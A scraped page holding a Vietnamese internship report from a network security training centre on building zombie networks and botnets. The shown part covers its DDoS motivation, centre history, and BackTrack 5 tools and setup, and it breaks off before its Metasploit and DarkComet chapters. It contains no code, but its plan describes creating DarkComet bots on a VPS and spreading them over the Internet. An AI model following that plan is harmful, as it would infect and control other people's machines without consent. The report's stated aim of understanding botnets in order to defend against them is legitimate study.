Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
 
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
 
Sơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdfSơ đồ tư duy môn sinh học bậc THPT.pdf
Sơ đồ tư duy môn sinh học bậc THPT.pdf
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
 
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
BỘ ĐỀ KIỂM TRA CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO CẤU TRÚC ĐỀ MIN...
 
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdfChuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
Chuong trinh dao tao Su pham Khoa hoc tu nhien, ma nganh - 7140247.pdf
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
 
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
 
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
10 ĐỀ KIỂM TRA + 6 ĐỀ ÔN TẬP CUỐI KÌ 2 VẬT LÝ 11 - KẾT NỐI TRI THỨC - THEO C...
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
 
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
 

Báo cáo thực tập - Quốc Nghị

  • 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP ĐỀ TÀI: Nghiên cứu và triển khai mạng lưới zombie , botnet trên hệ thống mạng GVHD : Võ Đỗ Thắng SVTT: Hồ Quốc Nghị
  • 2. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 2Trang LỜI CẢM ƠN    Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào Tạo Athena .Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng khóa, đến nay em đã hoàn thành xong đề tài: “Nghiên cứu và triển khai mạng lưới zoombie , botnet trên hệ thống mạng”. Để có được kết quả này, em xin chân thành cám ơn Thầy Võ Đỗ Thắng đã quan tâm hướng dẫn cho em trong suốt quá trình hoàn thành đề tài này. Vì thời gian có hạn cũng như kinh nghiệm còn thiếu nên đề tài của em không tránh khỏi những thiếu sót. Em rất mong nhận được sự chỉ bảo, đóng góp ý kiến của thầy để em có điều kiện bổ sung và có thể hoàn thành tốt đề tài của mình hơn. Sinh viên thực tập Hồ Quốc Nghị
  • 3. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 3Trang NHẬN XÉT TRUNG TÂM ATHENA    ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... ................................................................................................................................... TP.HCM, ngày …. tháng …. năm 2014 Giáo viên hướng dẫn Võ Đỗ Thắng
  • 4. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 4Trang MỤC LỤC I. LỜI MỞ ĐẦU.......................................................................................6 1. Sự cần thiết của đề tài ........................................................................................... 6 2. Mục tiêu nghiên cứu.............................................................................................. 6 3. Phương pháp nghiên cứu ...................................................................................... 6 II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA.............7 1. Sơ lược trung tâm.................................................................................................. 7 2. Trụ sở và các chi nhánh và thông tin liên hệ.......................................................... 7 a. Trụ sở chính............................................................................................................................7 b. Cơ sở tại HCM.........................................................................................................................8 c. Thông tin liên hệ.....................................................................................................................8 3. Quá trình hình thành và phát triển ........................................................................ 8 4. Cơ cấu tổ chức....................................................................................................... 9 5. Các khóa học của trung tâm Athena .................................................................... 10 a. Các khóa học dài hạn...........................................................................................................10 b. Các khóa học ngắn hạn........................................................................................................10 c. Các sản phẩm khác ..............................................................................................................11 d. Cơ sở hạ tầng .......................................................................................................................11 e. Các dịch vụ hỗ trợ.................................................................................................................11 6. Khách hàng của Athena ....................................................................................... 11 7. Đối tác của Athena............................................................................................... 12 8. Đội ngũ giảng viên của trung tâm đào tạo Athena ............................................... 12 III. GIỚI THIỆU VỀ BACKTRACK 5..........................................................13 1. Giới thiệu............................................................................................................. 13 2. Mục đích.............................................................................................................. 13 3. Cài đặt ................................................................................................................. 14 a. Cài đặt trong máy thật ........................................................................................................14 b. Cài đặt trong máy ảo...........................................................................................................14 IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN...........................................21 1. Triển khai trong môi trường LAN ......................................................................... 21 2. Thử nghiệm xâm nhập bằng Metasploit .............................................................. 22 V. XÂY DỰNG BONET BẰNG DARKCOMET...........................................24 3. Giới thiệu DarkComet .......................................................................................... 24
  • 5. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 5Trang 4. Cài đặt DarkComet............................................................................................... 24 VI. HƯỚNG PHÁT TRIỂN ...................................................................... 31 VII. KẾT LUẬN.......................................................................................31 VIII. TÀI LIỆU THAM KHẢO ..................................................................32
  • 6. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 6Trang I. LỜI MỞ ĐẦU 1. Sự cần thiết của đề tài Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất. DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013. Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ thống zombie, botnet. 2. Mục tiêu nghiên cứu Đề tài nghiên cứu trên hai môi trường: Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong mạng, thử xâm nhập trên các máy. Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển mạng lưới botnet thông qua mạng Internet. 3. Phương pháp nghiên cứu Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một mục tiêu. Giai đoạn 2: Cài đặt và tạo bot bằng DarkComet trên VPS (Virtual Private Server) và phát tán trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của VPS.
  • 7. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 7Trang II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA 1. Sơ lược trung tâm Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED. ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau: Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu. Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh. Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng. Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính. Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự... 2. Trụ sở và các chi nhánh và thông tin liên hệ a. Trụ sở chính Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
  • 8. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 8Trang b. Cơ sở tại HCM Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam c. Thông tin liên hệ Điện thoại: ( 84-8 ) 3824 4041 Điện thoại: ( 84-8 ) 2210 3801 Hotline: 0943 23 00 99 Website: www.Athena.Edu.Vn 3. Quá trình hình thành và phát triển Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập trung tâm gồm: - Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom. - Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT. - Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng. - Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena. Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam. Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại Đà Nẵng.
  • 9. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 9Trang Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm. Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng. Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 4. Cơ cấu tổ chức
  • 10. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 10Trang 5. Các khóa học của trung tâm Athena a. Các khóa học dài hạn - Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist. - Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician - Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist. - Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician. - Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator b. Các khóa học ngắn hạn - Quản trị mạng Microsoft căn bản ACBN . - Phần cứng máy tính, laptop, server . - Quản trị hệ thống mạng Microsoft MCSA Security. - Quản trị mạng Microsoft nâng cao MCSE. - Quản trị window Vista - Quản trị hệ thống Window Server 2008, 2012. - Lớp Master Exchange Mail Server.
  • 11. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 11Trang - Quản trị mạng quốc tế Cissco CCNA. - Quản trị hệ thống mạng Linux 1 và Linux 2. - Khóa thiết kế web và bảo mật mạng - Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart. - Lập trình web với Php và MySQL. - Bảo mật mạng quốc tế ACNS. - Hacker mũ trắng . - Athena Mastering Firewall Security. - Bảo mật website. c. Các sản phẩm khác - Chuyên đề thực hành sao lưu và phục hồi dữ liệu. - Chuyên đề thực hành bảo mật mạng Wi_Fi. - Chuyên đề Ghost qua mạng. - Chuyên đề xây dựng và quản trị diễn đàn. - Chuyên đề bảo mật dữ liệu phòng chống nội gián. - Chuyên đề quản lý tài sản công nghệ thông tin . - Chuyên đề kỹ năng thương mại điện tử. d. Cơ sở hạ tầng - Thiết bị đầy đủ và hiện đại. - Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất. - Phòng máy rộng rãi, thoáng mát. e. Các dịch vụ hỗ trợ - Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn. - Giới thiệu việc làm cho mọi học viên. - Thực tập có lương cho học viên khá giỏi. - Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian. - Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng. - Hỗ trợ thi Chứng chỉ Quốc tế. 6. Khách hàng của Athena Mọi đối tượng chuyên hoặc không chuyên về CNTT. Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
  • 12. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 12Trang 7. Đối tác của Athena Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính… 8. Đội ngũ giảng viên của trung tâm đào tạo Athena Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA. Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
  • 13. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 13Trang III. GIỚI THIỆU VỀ BACKTRACK 5 1. Giới thiệu Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm thâm nhập: WHAX và Auditor Security Collection 2. Mục đích Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau: Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu. Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và cũng làm portscanning. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID). Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.
  • 14. Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập 14Trang Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 3. Cài đặt Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack- linux.org/downloads/, có bản cho Vmware và file ISO. a. Cài đặt trong máy thật Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5. Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt b. Cài đặt trong máy ảo Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless. Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được card mạng thật, ta phải chọn Netword là Briged Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare: Vmware Workstation 9
